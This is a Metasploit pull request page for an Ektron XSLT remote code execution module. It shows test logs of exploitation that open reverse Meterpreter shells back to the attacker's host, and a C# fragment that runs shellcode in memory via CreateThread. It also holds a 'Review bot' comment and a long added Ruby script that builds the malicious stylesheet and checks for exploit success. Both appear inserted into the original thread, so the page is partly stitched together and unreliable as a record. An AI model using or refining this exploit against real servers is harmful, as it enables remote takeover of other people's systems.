
added c# code by Nicolas Gregoire #1156

Merged
merged 1 commit into rapid7:master from ektron_xslt_exec_nicob on Dec 11, 2012

Conversation

jvazquez-r7
Contributor

Used the C# code by Nicolas Gregoire to avoid dropping shellcode to filesystem. See:

https://dev.metasploit.com/redmine/issues/6784

Nicolas credited in the module too.

Test:

msf > use exploit/windows/http/ektron_xslt_exec 
msf  exploit(ektron_xslt_exec) > reload
[*] Reloading module...
msf  exploit(ektron_xslt_exec) > set RHOST 192.168.1.139
RHOST => 192.168.1.139
msf  exploit(ektron_xslt_exec) > check
[+] The target is vulnerable.
msf  exploit(ektron_xslt_exec) > exploit

[*] Started reverse handler on 192.168.1.129:4444 
[*] Generating the EXE Payload and the XSLT...
[*] Trying to run the xslt transformation...
[+] Exploitation was successful
[*] Sending stage (752128 bytes) to 192.168.1.139
[*] Meterpreter session 1 opened (192.168.1.129:4444 -> 192.168.1.139:2090) at 2012-12-11 16:32:43 +0100

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit 
[*] Shutting down Meterpreter...

[*] 192.168.1.139 - Meterpreter session 1 closed.  Reason: User exit

IntPtr pinfo = IntPtr.Zero;
UInt32 threadId = 0;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
return "#{fingerprint}";
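Review bot: the handle returned by CreateThread is stored in hThread but never examined before `return "#{fingerprint}";`, so a failed thread creation (a zero handle) still renders the fingerprint into the result XML and the module will report "Exploitation was successful" even though no payload thread runs. Suggest guarding the return, e.g. `if (hThread == IntPtr.Zero) return "";` (adjusted to whatever return type the CreateThread declaration uses), so the fingerprint is only emitted when the thread was actually started.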
Contributor

Why not just return fingerprint? fingerprint is already a string...

Contributor

You might have missed that this is C# code inside a here-document in Ruby code. The #{fingerprint} thing will be replaced by Ruby, therefore generating C# code like

return "Blahblah";

which will in turn be compiled by the XSLT processor and rendered into the result XML for verification of successful exploit.

return fingerprint;

at that place will create a stylesheet compilation error as there is no C# variable named fingerprint in this sample code.

Contributor

You are correct, I did.
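The exchange above, as an added example (not the module's own code, and not Nicolas Gregoire's C#): a Ruby script that builds an XSLT stylesheet with an msxsl:script C# block through a double-quoted here-document, so that #{fingerprint} is expanded by Ruby into a C# string literal before anything is sent, and then checks a transformation result for that literal. The stylesheet layout, the Run() method name, the urn:example-script namespace and the sample response are assumptions for illustration; the in-memory loader statements the real module places before the return statement are not reproduced.

```ruby
require 'securerandom'

# Build the stylesheet. This is a double-quoted here-document, so Ruby expands
# #{fingerprint} here; the C# compiler on the target only ever sees a literal.
# (Added example; stylesheet shape and Run() are assumptions, not the module's.)
def build_xslt(fingerprint)
  <<-XSLT
<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="urn:example-script">
  <msxsl:script language="C#" implements-prefix="user">
  <![CDATA[
    public string Run()
    {
        // the module's in-memory loader statements precede this line
        return "#{fingerprint}";
    }
  ]]>
  </msxsl:script>
  <xsl:template match="/">
    <result><xsl:value-of select="user:Run()"/></result>
  </xsl:template>
</xsl:stylesheet>
  XSLT
end

# Confirms the interpolation happened: the generated C# must contain the
# fingerprint as a quoted literal and must not contain the raw #{...} text.
# A bare `return fingerprint;` in the C# would not compile, since no C#
# variable of that name exists; the literal is what makes the stylesheet valid.
def literal_emitted?(xslt, fingerprint)
  xslt.include?(%(return "#{fingerprint}";)) && !xslt.include?('#{fingerprint}')
end

# Success check on the transformation result: the fingerprint has to appear as
# the text of the <result> element, not merely anywhere in the body, so a page
# that echoes the submitted stylesheet back does not count as a success.
def exploited?(result_xml, fingerprint)
  pattern = %r{<result>\s*#{Regexp.escape(fingerprint)}\s*</result>}
  !(result_xml =~ pattern).nil?
end

if __FILE__ == $0
  fp = SecureRandom.alphanumeric(12)
  xslt = build_xslt(fp)
  puts xslt
  puts "literal emitted: #{literal_emitted?(xslt, fp)}"
  # Constructed sample response, standing in for the target's result document.
  sample = "<?xml version=\"1.0\"?><result>#{fp}</result>"
  puts "exploited: #{exploited?(sample, fp)}"
end
```

Running the script prints the generated stylesheet with the random fingerprint already substituted into the C# return statement, which is exactly the text the target's XSLT processor compiles; the two predicates are what a check routine would apply before and after the request.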

@wchen-r7
Contributor

This will take me some time to verify. I shoulda made a snapshot for this....

@wchen-r7
Contributor

tested:

[*] Started reverse handler on 10.0.1.3:4444 
[*] Generating the EXE Payload and the XSLT...
[*] Trying to run the xslt transformation...
[+] Exploitation was successful
[*] Sending stage (752128 bytes) to 10.0.1.10
[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.10:1071) at 2012-12-11 12:43:21 -0600

meterpreter >

@wchen-r7 wchen-r7 merged commit 2eb4de8 into rapid7:master Dec 11, 2012
@jvazquez-r7 jvazquez-r7 deleted the ektron_xslt_exec_nicob branch November 18, 2014 15:46
4 participants